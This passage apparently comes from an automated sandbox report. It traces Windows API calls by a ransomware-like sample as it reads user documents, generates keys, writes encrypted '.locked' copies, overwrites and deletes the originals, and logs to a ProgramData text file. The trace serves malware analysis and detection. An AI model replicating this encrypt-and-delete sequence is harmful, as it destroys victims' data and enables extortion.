lpOverlapped=0x0) returned 1 [0278.365] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0279.081] SetEvent (hEvent=0x150) returned 1 [0279.081] SetEvent (hEvent=0x1b8) returned 1 [0279.081] CloseHandle (hObject=0x188) returned 1 [0279.139] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0280.124] CloseHandle (hObject=0x180) returned 1 [0280.125] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0280.125] GetConsoleMode (in: hConsoleHandle=0x180, lpMode=0x1265be94 | out: lpMode=0x1265be94) returned 0 [0280.125] WriteFile (in: hFile=0x180, lpBuffer=0x124940a0*, nNumberOfBytesToWrite=0x48, lpNumberOfBytesWritten=0x1265be64, lpOverlapped=0x0 | out: lpBuffer=0x124940a0*, lpNumberOfBytesWritten=0x1265be64*=0x48, lpOverlapped=0x0) returned 1 [0280.125] CloseHandle (hObject=0x180) returned 1 [0280.127] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\b1s7y96Y6gVCDj\\53CjZJnv.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\b1s7y96y6gvcdj\\53cjzjnv.avi")) returned 1 [0280.314] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0280.514] SetEvent (hEvent=0x1dc) returned 1 [0280.514] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0280.542] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0280.790] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0280.790] GetConsoleMode (in: hConsoleHandle=0x1bc, lpMode=0x1276ee94 | out: lpMode=0x1276ee94) returned 0 [0280.790] WriteFile (in: hFile=0x1bc, lpBuffer=0x125ee0c0*, nNumberOfBytesToWrite=0x54, lpNumberOfBytesWritten=0x1276ee64, lpOverlapped=0x0 | out: lpBuffer=0x125ee0c0*, lpNumberOfBytesWritten=0x1276ee64*=0x54, lpOverlapped=0x0) returned 1 [0280.824] CloseHandle (hObject=0x1bc) returned 1 [0280.826] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\b1s7y96Y6gVCDj\\7pK8Q9_TXKB_8t_99Nak.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\b1s7y96y6gvcdj\\7pk8q9_txkb_8t_99nak.gif")) returned 1 [0280.908] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0282.506] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\b1s7y96Y6gVCDj\\7pK8Q9_TXKB_8t_99Nak.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\b1s7y96y6gvcdj\\7pk8q9_txkb_8t_99nak.gif"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0282.781] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0283.580] GetConsoleMode (in: hConsoleHandle=0x180, lpMode=0x1276ee88 | out: lpMode=0x1276ee88) returned 0 [0283.581] SetEvent (hEvent=0x104) returned 1 [0283.581] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0283.635] SetEvent (hEvent=0x14c) returned 1 [0283.635] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0283.699] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0283.777] SetEvent (hEvent=0x1ac) returned 1 [0283.777] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0x1) returned 0x102 [0283.797] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0283.797] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0x1) returned 0x102 [0283.858] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0283.859] SetEvent (hEvent=0x1dc) returned 1 [0283.859] SetEvent (hEvent=0x1ac) returned 1 [0283.859] SetEvent (hEvent=0x198) returned 1 [0283.859] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0283.889] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33f6fb34, ulCount=0x10, ulNumEntriesRemoved=0x33f6fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33f6fb34, ulNumEntriesRemoved=0x33f6fb14) returned 0 [0283.889] SetEvent (hEvent=0x150) returned 1 [0283.889] SetEvent (hEvent=0x1ac) returned 1 [0283.889] SetEvent (hEvent=0x198) returned 1 [0283.889] SetEvent (hEvent=0x1dc) returned 1 [0283.889] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\b1s7y96Y6gVCDj\\C5Fa.mkv" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\b1s7y96y6gvcdj\\c5fa.mkv")) returned 1 [0283.955] SetEvent (hEvent=0x14c) returned 1 [0283.955] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0284.077] SetEvent (hEvent=0x1b8) returned 1 [0284.077] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0284.367] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0284.380] SetEvent (hEvent=0x134) returned 1 [0284.380] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0x1) returned 0x102 [0284.484] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0284.484] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0x1) returned 0x102 [0284.498] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0284.498] SetEvent (hEvent=0x21c) returned 1 [0284.498] SetEvent (hEvent=0x14c) returned 1 [0284.498] SetEvent (hEvent=0x198) returned 1 [0284.498] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0284.553] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33f6fb34, ulCount=0x10, ulNumEntriesRemoved=0x33f6fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33f6fb34, ulNumEntriesRemoved=0x33f6fb14) returned 0 [0284.553] SetEvent (hEvent=0x150) returned 1 [0284.553] SetEvent (hEvent=0x198) returned 1 [0284.553] SetEvent (hEvent=0x14c) returned 1 [0284.553] SetEvent (hEvent=0x20c) returned 1 [0284.553] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0284.742] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0x1) returned 0x0 [0284.932] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33f6fb30, ulCount=0x10, ulNumEntriesRemoved=0x33f6fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33f6fb30, ulNumEntriesRemoved=0x33f6fb10) returned 0 [0284.932] SetEvent (hEvent=0x150) returned 1 [0284.932] SetEvent (hEvent=0x104) returned 1 [0284.932] SetEvent (hEvent=0x21c) returned 1 [0284.932] SetEvent (hEvent=0x14c) returned 1 [0284.937] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0x1) returned 0x102 [0284.971] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0284.971] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0x1) returned 0x0 [0284.996] SetEvent (hEvent=0x14c) returned 1 [0284.996] SetEvent (hEvent=0x21c) returned 1 [0284.996] SetEvent (hEvent=0x104) returned 1 [0284.996] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0285.030] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33f6fb34, ulCount=0x10, ulNumEntriesRemoved=0x33f6fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33f6fb34, ulNumEntriesRemoved=0x33f6fb14) returned 0 [0285.030] SetEvent (hEvent=0x150) returned 1 [0285.030] SetEvent (hEvent=0x21c) returned 1 [0285.030] SetEvent (hEvent=0x104) returned 1 [0285.030] SetEvent (hEvent=0x14c) returned 1 [0285.038] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\b1s7y96Y6gVCDj\\53CjZJnv.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\b1s7y96y6gvcdj\\53cjzjnv.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x218 [0285.159] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0286.019] GetConsoleMode (in: hConsoleHandle=0x218, lpMode=0x1265be88 | out: lpMode=0x1265be88) returned 0 [0286.019] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0286.373] SetEvent (hEvent=0x20c) returned 1 [0286.373] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0286.465] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0286.997] SetEvent (hEvent=0x1dc) returned 1 [0286.998] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0299.252] SetEvent (hEvent=0x220) returned 1 [0299.252] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0299.544] SetEvent (hEvent=0x134) returned 1 [0299.544] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0299.670] SetEvent (hEvent=0x14c) returned 1 [0299.670] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0299.724] SetEvent (hEvent=0x1f0) returned 1 [0299.724] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0x1) returned 0x102 [0299.737] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0299.737] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0x1) returned 0x102 [0299.742] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0299.742] SetEvent (hEvent=0x190) returned 1 [0299.742] SetEvent (hEvent=0x1e8) returned 1 [0299.742] SetEvent (hEvent=0x1f0) returned 1 [0299.742] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0299.743] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33f6fb34, ulCount=0x10, ulNumEntriesRemoved=0x33f6fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33f6fb34, ulNumEntriesRemoved=0x33f6fb14) returned 0 [0299.743] SetEvent (hEvent=0x150) returned 1 [0299.743] SetEvent (hEvent=0x1f0) returned 1 [0299.743] SetEvent (hEvent=0x1e8) returned 1 [0299.743] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\8NTFMxPNLnS-.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\8ntfmxpnlns-.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f4 [0299.744] GetConsoleMode (in: hConsoleHandle=0x1f4, lpMode=0x1239fd9c | out: lpMode=0x1239fd9c) returned 0 [0299.744] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\8NTFMxPNLnS-.xlsx.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\8ntfmxpnlns-.xlsx.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b0 [0299.913] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0299.976] GetConsoleMode (in: hConsoleHandle=0x1b0, lpMode=0x1239fd9c | out: lpMode=0x1239fd9c) returned 0 [0299.976] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0300.041] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12390000 | out: pbBuffer=0x12390000) returned 1 [0300.041] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12766020 | out: pbBuffer=0x12766020) returned 1 [0300.041] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702201 | out: pbBuffer=0x12702201) returned 1 [0300.041] WriteFile (in: hFile=0x1b0, lpBuffer=0x12679000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1239fd78, lpOverlapped=0x0 | out: lpBuffer=0x12679000*, lpNumberOfBytesWritten=0x1239fd78*=0x80, lpOverlapped=0x0) returned 1 [0300.057] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0x1) returned 0x0 [0300.058] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33f6fb30, ulCount=0x10, ulNumEntriesRemoved=0x33f6fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33f6fb30, ulNumEntriesRemoved=0x33f6fb10) returned 0 [0300.058] SetEvent (hEvent=0x150) returned 1 [0300.058] SetEvent (hEvent=0x198) returned 1 [0300.058] SetEvent (hEvent=0x134) returned 1 [0300.058] SetEvent (hEvent=0x21c) returned 1 [0300.058] ReadFile (in: hFile=0x1f4, lpBuffer=0x12974000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1239fd68, lpOverlapped=0x0 | out: lpBuffer=0x12974000*, lpNumberOfBytesRead=0x1239fd68*=0xd372, lpOverlapped=0x0) returned 1 [0300.062] WriteFile (in: hFile=0x1b0, lpBuffer=0x12974000*, nNumberOfBytesToWrite=0xd372, lpNumberOfBytesWritten=0x1239fd74, lpOverlapped=0x0 | out: lpBuffer=0x12974000*, lpNumberOfBytesWritten=0x1239fd74*=0xd372, lpOverlapped=0x0) returned 1 [0300.142] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0300.431] SetEvent (hEvent=0x150) returned 1 [0300.431] SetEvent (hEvent=0x12c) returned 1 [0300.431] ReadFile (in: hFile=0x1f4, lpBuffer=0x12974000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1239fd68, lpOverlapped=0x0 | out: lpBuffer=0x12974000*, lpNumberOfBytesRead=0x1239fd68*=0x0, lpOverlapped=0x0) returned 1 [0300.432] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0300.471] CloseHandle (hObject=0x1b0) returned 1 [0300.475] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0300.665] CloseHandle (hObject=0x1f4) returned 1 [0300.665] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0301.421] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x230 [0301.421] GetConsoleMode (in: hConsoleHandle=0x230, lpMode=0x1239fe94 | out: lpMode=0x1239fe94) returned 0 [0301.421] WriteFile (in: hFile=0x230, lpBuffer=0x123801c0*, nNumberOfBytesToWrite=0x3c, lpNumberOfBytesWritten=0x1239fe64, lpOverlapped=0x0 | out: lpBuffer=0x123801c0*, lpNumberOfBytesWritten=0x1239fe64*=0x3c, lpOverlapped=0x0) returned 1 [0301.422] CloseHandle (hObject=0x230) returned 1 [0301.423] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\8NTFMxPNLnS-.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\8ntfmxpnlns-.xlsx")) returned 1 [0301.520] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0301.531] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0301.535] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0301.540] SetEvent (hEvent=0x20c) returned 1 [0301.540] SetEvent (hEvent=0x134) returned 1 [0301.540] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0302.121] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\8NTFMxPNLnS-.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\8ntfmxpnlns-.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0302.129] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0302.787] GetConsoleMode (in: hConsoleHandle=0x188, lpMode=0x1276de88 | out: lpMode=0x1276de88) returned 0 [0302.787] WriteFile (in: hFile=0x188, lpBuffer=0x14e1e000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1276de78, lpOverlapped=0x0 | out: lpBuffer=0x14e1e000*, lpNumberOfBytesWritten=0x1276de78*=0xfa000, lpOverlapped=0x0) returned 1 [0302.860] CloseHandle (hObject=0x188) returned 1 [0303.045] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0303.756] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\8NTFMxPNLnS-.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\8ntfmxpnlns-.xlsx")) returned 1 [0303.785] SetEvent (hEvent=0x1b8) returned 1 [0303.785] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0303.824] SetEvent (hEvent=0x134) returned 1 [0303.824] SetEvent (hEvent=0x198) returned 1 [0303.824] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0303.828] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0303.837] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0303.847] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1234c200*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x12621a24, lpReserved=0x0 | out: lpBuffer=0x1234c200*, lpNumberOfCharsWritten=0x12621a24*=0xb) returned 1 [0303.853] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\GFqXQi80UXX3UPgD.pdf" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\gfqxqi80uxx3upgd.pdf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0303.853] GetConsoleMode (in: hConsoleHandle=0x1bc, lpMode=0x12621d9c | out: lpMode=0x12621d9c) returned 0 [0303.853] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\GFqXQi80UXX3UPgD.pdf.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\gfqxqi80uxx3upgd.pdf.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0303.871] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0304.001] GetConsoleMode (in: hConsoleHandle=0x228, lpMode=0x12621d9c | out: lpMode=0x12621d9c) returned 0 [0304.001] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x125fc000 | out: pbBuffer=0x125fc000) returned 1 [0304.001] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12766020 | out: pbBuffer=0x12766020) returned 1 [0304.001] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12714001 | out: pbBuffer=0x12714001) returned 1 [0304.001] WriteFile (in: hFile=0x228, lpBuffer=0x12719000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12621d78, lpOverlapped=0x0 | out: lpBuffer=0x12719000*, lpNumberOfBytesWritten=0x12621d78*=0x80, lpOverlapped=0x0) returned 1 [0304.012] ReadFile (in: hFile=0x1bc, lpBuffer=0x14cd0000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12621d68, lpOverlapped=0x0 | out: lpBuffer=0x14cd0000*, lpNumberOfBytesRead=0x12621d68*=0x2810, lpOverlapped=0x0) returned 1 [0304.018] WriteFile (in: hFile=0x228, lpBuffer=0x14cd0000*, nNumberOfBytesToWrite=0x2810, lpNumberOfBytesWritten=0x12621d74, lpOverlapped=0x0 | out: lpBuffer=0x14cd0000*, lpNumberOfBytesWritten=0x12621d74*=0x2810, lpOverlapped=0x0) returned 1 [0304.038] ReadFile (in: hFile=0x1bc, lpBuffer=0x14cd0000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12621d68, lpOverlapped=0x0 | out: lpBuffer=0x14cd0000*, lpNumberOfBytesRead=0x12621d68*=0x0, lpOverlapped=0x0) returned 1 [0304.038] CloseHandle (hObject=0x228) returned 1 [0304.045] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0304.167] CloseHandle (hObject=0x1bc) returned 1 [0304.168] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0304.168] GetConsoleMode (in: hConsoleHandle=0x1bc, lpMode=0x12621e94 | out: lpMode=0x12621e94) returned 0 [0304.168] WriteFile (in: hFile=0x1bc, lpBuffer=0x126d0480*, nNumberOfBytesToWrite=0x53, lpNumberOfBytesWritten=0x12621e64, lpOverlapped=0x0 | out: lpBuffer=0x126d0480*, lpNumberOfBytesWritten=0x12621e64*=0x53, lpOverlapped=0x0) returned 1 [0304.168] CloseHandle (hObject=0x1bc) returned 1 [0304.170] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\GFqXQi80UXX3UPgD.pdf" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\gfqxqi80uxx3upgd.pdf")) returned 1 [0304.177] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0304.329] SetEvent (hEvent=0x104) returned 1 [0304.329] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0304.331] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0304.336] SetEvent (hEvent=0x1ac) returned 1 [0304.336] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0304.410] SetEvent (hEvent=0x134) returned 1 [0304.410] SetEvent (hEvent=0x12c) returned 1 [0304.410] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0x1) returned 0x102 [0304.417] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0304.417] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0x1) returned 0x102 [0304.419] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0304.419] SetEvent (hEvent=0x1b8) returned 1 [0304.419] SetEvent (hEvent=0x12c) returned 1 [0304.419] SetEvent (hEvent=0x21c) returned 1 [0304.419] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0304.421] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33f6fb34, ulCount=0x10, ulNumEntriesRemoved=0x33f6fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33f6fb34, ulNumEntriesRemoved=0x33f6fb14) returned 0 [0304.421] SetEvent (hEvent=0x150) returned 1 [0304.421] SetEvent (hEvent=0x12c) returned 1 [0304.421] SetEvent (hEvent=0x21c) returned 1 [0304.421] SetEvent (hEvent=0x1b8) returned 1 [0304.467] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\L-u71CPit811c.xls" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\l-u71cpit811c.xls"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0304.658] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0304.704] SetEvent (hEvent=0x22c) returned 1 [0304.704] GetConsoleMode (in: hConsoleHandle=0x228, lpMode=0x12665e88 | out: lpMode=0x12665e88) returned 0 [0304.704] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0304.731] SetEvent (hEvent=0x1f0) returned 1 [0304.731] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0304.733] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0304.771] SetEvent (hEvent=0x21c) returned 1 [0304.771] SetEvent (hEvent=0x14c) returned 1 [0304.771] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0305.023] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0305.169] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\aLqbOAns.odp.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\alqboans.odp.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0305.441] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0305.718] SetEvent (hEvent=0x1f0) returned 1 [0305.718] GetConsoleMode (in: hConsoleHandle=0x1e0, lpMode=0x1249cd9c | out: lpMode=0x1249cd9c) returned 0 [0305.718] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0305.820] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0305.827] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\EPo8_m0ryn 6ACWfcC.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\epo8_m0ryn 6acwfcc.doc")) returned 1 [0305.856] SetEvent (hEvent=0x1dc) returned 1 [0305.856] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0305.858] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0305.898] SetEvent (hEvent=0x14c) returned 1 [0305.898] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0306.470] SetEvent (hEvent=0x1ac) returned 1 [0306.470] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0306.477] SetEvent (hEvent=0x12c) returned 1 [0306.477] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0306.611] SetEvent (hEvent=0x1f0) returned 1 [0306.611] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0306.692] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x12390260*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x125e5a24, lpReserved=0x0 | out: lpBuffer=0x12390260*, lpNumberOfCharsWritten=0x125e5a24*=0xb) returned 